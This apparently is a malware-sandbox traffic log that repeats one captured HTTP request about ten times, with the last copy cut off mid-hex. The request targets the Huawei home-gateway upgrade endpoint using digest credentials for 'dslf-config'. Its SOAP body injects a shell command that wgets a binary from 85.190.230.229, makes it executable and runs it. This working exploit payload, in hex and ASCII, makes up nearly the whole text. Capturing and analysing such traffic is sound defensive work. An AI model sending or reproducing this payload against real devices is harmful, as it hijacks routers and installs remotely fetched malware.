              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 